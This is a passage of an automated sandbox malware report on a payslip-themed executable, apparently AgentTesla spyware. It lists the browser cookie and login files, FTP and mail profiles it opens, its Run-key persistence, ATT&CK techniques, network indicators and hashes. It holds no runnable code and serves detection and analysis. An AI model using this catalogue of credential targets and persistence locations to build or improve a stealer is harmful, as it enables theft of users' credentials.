                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Queries volume information: C:\Users\user\Desktop\Payslip_October_2024.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Queries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match, File source: dump.pcap, type: PCAP
                    Source: Yara match, File source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000002.1889661399.0000000002BBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000008.00000002.4124052676.0000000002C2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000002.00000002.4125026006.0000000002C4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000002.00000002.4125026006.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000008.00000002.4124052676.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: Payslip_October_2024.exe PID: 7532, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: Payslip_October_2024.exe PID: 7692, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sgxIb.exe PID: 8008, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sgxIb.exe PID: 6128, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\FTP Navigator\Ftplist.txt
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\Payslip_October_2024.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara match, File source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payslip_October_2024.exe.49c6e28.1.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payslip_October_2024.exe.49c6e28.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payslip_October_2024.exe.4948c08.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 0.2.Payslip_October_2024.exe.48ca9e8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match, File source: 00000005.00000002.1889661399.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000005.00000002.1886245023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000002.00000002.4125026006.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000008.00000002.4124052676.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: 00000000.00000002.1678620012.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match, File source: Process Memory Space: Payslip_October_2024.exe PID: 7532, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: Payslip_October_2024.exe PID: 7692, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sgxIb.exe PID: 8008, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: sgxIb.exe PID: 6128, type: MEMORYSTR

                    Remote Access Functionality


                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    1
                    File and Directory Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Ingress Tool Transfer
                    1
                    Exfiltration Over Alternative Protocol
                    Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder
                    112
                    Process Injection
                    1
                    Deobfuscate/Decode Files or Information
                    21
                    Input Capture
                    24
                    System Information Discovery
                    Remote Desktop Protocol2
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder
                    3
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    1
                    Query Registry
                    SMB/Windows Admin Shares1
                    Email Collection
                    1
                    Non-Standard Port
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing
                    NTDS211
                    Security Software Discovery
                    Distributed Component Object Model21
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading
                    LSA Secrets2
                    Process Discovery
                    SSH1
                    Clipboard Data
                    23
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading
                    Cached Domain Credentials141
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion
                    DCSync1
                    Application Window Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                    Process Injection
                    Proc Filesystem1
                    System Network Configuration Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories
                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    Behavior Graph (image not reproduced): ID: 1548796, Sample: Payslip_October_2024.exe, Startdate: 04/11/2024, Architecture: WINDOWS, Score: 100

                    Source | Detection | Scanner | Label
                    Payslip_October_2024.exe | 32% | ReversingLabs | Win32.Trojan.Generic
                    Payslip_October_2024.exe | 100% | Joe Sandbox ML |

                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe | 32% | ReversingLabs | Win32.Trojan.AgentTesla

                    No Antivirus matches
                    No Antivirus matches

                    Source | Detection | Scanner | Label
                    http://www.microsoft.cogu7 | 0% | Avira URL Cloud | safe
                    http://www.sakkal.comP; | 0% | Avira URL Cloud | safe

                    Name | IP | Active | Malicious | Antivirus Detection | Reputation
                    api.ipify.org | 104.26.12.205 | true | false | | high
                    ftp.haliza.com.my | 110.4.45.197 | true | true | | unknown

                    Name | Malicious | Antivirus Detection | Reputation
                    https://api.ipify.org/ | false | | high

                    IP | Domain | Country | ASN | ASN Name | Malicious
                    104.26.12.205 | api.ipify.org | United States | 13335 | CLOUDFLARENETUS | false
                    110.4.45.197 | ftp.haliza.com.my | Malaysia | 46015 | EXABYTES-AS-APExaBytesNetworkSdnBhdMY | true

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1548796
                                                                                      Start date and time:2024-11-04 21:24:03 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 9m 31s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:12
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:Payslip_October_2024.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@11/4@2/2
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 99%
                                                                                      • Number of executed functions: 346
                                                                                      • Number of non-executed functions: 32
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • VT rate limit hit for: Payslip_October_2024.exe

                    Time | Type | Description
                    15:24:52 | API Interceptor | 6516619x Sleep call for process: Payslip_October_2024.exe modified
                    15:25:06 | API Interceptor | 5479711x Sleep call for process: sgxIb.exe modified
                    20:24:57 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                    20:25:06 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    104.26.12.205 | Yc9hcFC1ux.exe | malicious | Unknown | api.ipify.org/
                    104.26.12.205 | 6706e721f2c06.exe | malicious | Remcos | api.ipify.org/
                    104.26.12.205 | perfcc.elf | malicious | Xmrig | api.ipify.org/
                    104.26.12.205 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
                    104.26.12.205 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
                    104.26.12.205 | hloRQZmlfg.exe | malicious | RDPWrap Tool | api.ipify.org/
                    104.26.12.205 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
                    104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
                    104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
                    104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
                    110.4.45.197 | Payslip_October_2024_pdf.exe | malicious | AgentTesla |
                    110.4.45.197 | Payslip_October_2024_pdf.exe | malicious | AgentTesla |
                    110.4.45.197 | Payslip_October_2024.pdf.exe | malicious | AgentTesla |
                    110.4.45.197 | rMT103_126021720924.exe | malicious | AgentTesla |
                    110.4.45.197 | z1Transaction_ID_REF2418_cmd.bat | malicious | AgentTesla, DBatLoader, PureLog Stealer |
                    110.4.45.197 | z20SWIFT_MT103_Payment_552016_pdf.exe | malicious | AgentTesla, PureLog Stealer |
                    110.4.45.197 | Order Specifications for Materials.docx.exe | malicious | AgentTesla, PureLog Stealer |
                    110.4.45.197 | z14Employee_Contract_pdf.exe | malicious | AgentTesla |
                    110.4.45.197 | Order Specifications for Materials.docx.exe | malicious | AgentTesla |
                    110.4.45.197 | DHL_Shipment_Details_8th_October.pdf.exe | malicious | AgentTesla |

                    Match | Associated Sample Name / URL | Detection | Threat Name | Context
                    api.ipify.org | CFuejz2dRu.exe | malicious | Discord Token Stealer | 104.26.13.205
                    api.ipify.org | CFuejz2dRu.exe | malicious | Discord Token Stealer | 104.26.13.205
                                                                                                          2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.74.152
                                                                                                          2b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.13.205
                                                                                                          Zc9eO57fgF.elfGet hashmaliciousUnknownBrowse
                                                                                                          • 172.67.74.152
                                                                                                          Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 172.67.74.152
                                                                                                          Quotation.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          Copia de pago de la Orden de compra OI16014 y OI16015.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.12.205
                                                                                                          QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 172.67.74.152
                                                                                                          Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 104.26.13.205
                                                                                                          ftp.haliza.com.myPayslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Payslip_October_2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          CLOUDFLARENETUSFW Reminder Steve Daugherty shared ALAMO1 _ AGREEMENT.paper with you.msgGet hashmaliciousUnknownBrowse
                                                                                                          • 104.16.99.29
                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                          • 104.21.5.155
                                                                                                          https://lincolnok.nimbusweb.me/share/11356312/zkr5e4o5lvh67fyvfxtwGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 1.1.1.1
                                                                                                          https://q2leem1z7of18zd8cjwcukwbzqg16yotalans8rynovtws66yyb.unimpociarp.comGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.97.3
                                                                                                          https://z7.mqis1u.com/27p3mW2jbVyhAO1WQDjPk/Get hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Office365_Alert_details Doc#(AL).htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.17.25.14
                                                                                                          afe7cvkMKi.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                          • 172.67.133.135
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                          • 104.21.5.155
                                                                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                          • 104.21.5.155
                                                                                                          https://t.ly/UEfhCGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                          • 104.17.25.14
                                                                                                          EXABYTES-AS-APExaBytesNetworkSdnBhdMYPayslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Txwd 4063517991 djxjdlxmbk.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                          • 103.6.199.200
                                                                                                          Payslip_October_2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                          • 110.4.45.197
                                                                                                          z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                          • 110.4.45.197
                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          3b5074b1b5d032e5620f69f9f700ff0ehttp://peakstone-sharepoint.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                          • 104.26.12.205
                                                                                                          _Retail_Benefits_and_Commission_2024.svgGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          https://ichi-up.net/finish?experiment=END_BANNER_DIGI&url=//a2050ef0001ec97034e879d6a229c6f3.vrkad7xao5.free.hr/9484181209/75b13b249b2b8fc5625604396907f89475f7463e/finance@monroecounty.govGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                          • 104.26.12.205
                                                                                                          file.exeGet hashmaliciousXWormBrowse
                                                                                                          • 104.26.12.205
                                                                                                          https://dontcrydesignlab.com/reports.phpGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                          • 104.26.12.205
                                                                                                          A Wireless Caller left a recording #iE0rfKd.emlGet hashmaliciousUnknownBrowse
                                                                                                          • 104.26.12.205
                                                                                                          0oyt0YS20b.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          vbe11TPn2x.exeGet hashmaliciousFlesh StealerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          att1-241104022450_PDF.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 104.26.12.205
                                                                                                          No context
                                                                                                          Process:C:\Users\user\Desktop\Payslip_October_2024.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1216
                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                          Malicious:true
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                          Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1216
                                                                                                          Entropy (8bit):5.34331486778365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
